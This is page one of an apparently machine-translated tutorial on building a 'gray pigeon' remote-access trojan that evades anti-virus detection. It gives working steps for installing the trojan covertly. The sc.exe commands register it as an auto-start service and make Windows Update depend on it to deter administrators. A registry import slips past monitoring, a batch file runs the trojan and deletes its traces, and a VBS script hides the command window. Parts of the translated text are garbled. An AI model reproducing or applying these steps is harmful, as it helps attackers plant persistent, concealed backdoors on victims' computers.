A simple method is used to create a gray pigeon that will not be killed by anti-virus software.

Soon after the official launch of this method, I was inspired by the Radmin configuration and had no technical skills. I never dared to say it to everyone for fear of jokes, so laruence would not have to watch it.

Now let's talk about the subject:

Our goal is:

Go through official kill and click it to actively defend against the undead pigeon

Preparation tools:

Pigeon Server

IcoSprite icon changer;

SC .exe adds and deletes a change tool;

Winrar

Program features:

Self-extract mode, double-click

Production process:
1. Configure the pigeon server by yourself. Do not fill in [startup Item settings] here during configuration, do not write it into the registry, or start it with a service. Others are what you like.

2. Use SC to create a service

Run CMD. EXE and run it in the system32 directory.

SC .exe create huigezi BinPath = "% systemroot % \ system32 \ gezi.exe" type = own type = interact start = auto DisplayName = "gezi"
'This statement uses SC to create a service named huigezi, the path Binpath is "% systemroot % \ system32 \ gezi.exe", and the type is own and interact, start is automatic, and DisplayName is "gezi ".

SC .exe descript_ion huigezi "undead pigeon"
'Change the description of the huigezi service to "no dead pigeon"

SC config wuauserv depend = huigezi
'Configure huigezi to make the wuauserv service dependent on this service (wuauserv can be changed to another service as per your preferences. Here wuauserv is the automatic Update service of the system on the Windows Update Website ).

The purpose here is to confuse the administrator so that it does not dare to stop our generated services easily. You can also add more points on your own.

3. export these data from the Registry. My personal experience is: Registry monitoring, such as rising star and clicking bar, will not trigger alarms on the imported registry. We will name it 1.reg.

4. Create a BAT file and name it update. bat.

@ Regedit/s % systemroot % \ system32 \ 1.reg
@ % Systemroot % \ system32 \ gezi.exe
@ Del/q/f/s % systemroot % \ system32 \ 1.reg
@ Del/q/f/s % systemroot % \ system32 \ Update. vbs
@ Del/q/f/s % systemroot % \ system32 \ Update. bat

5. Create a vbs and name it update. vbs.

The purpose is to make the content in bat Run in quiet mode, so that the cmd window can jump out and a lot of concealment is added.

Write the following code:

On Error Resume Next
Set wshshell = createobject ("wscript _. shell ")
A = wshshell. run ("cmd.exe/C % systemroot % \ system32 \ Update. bat", 0, TRUE)

1 2 Next Page

[Content navigation]
Page 1st: a simple way to create a gray pigeon that is not killed by anti-virus software	Page 2nd: a simple way to create a gray pigeon that is not killed by anti-virus software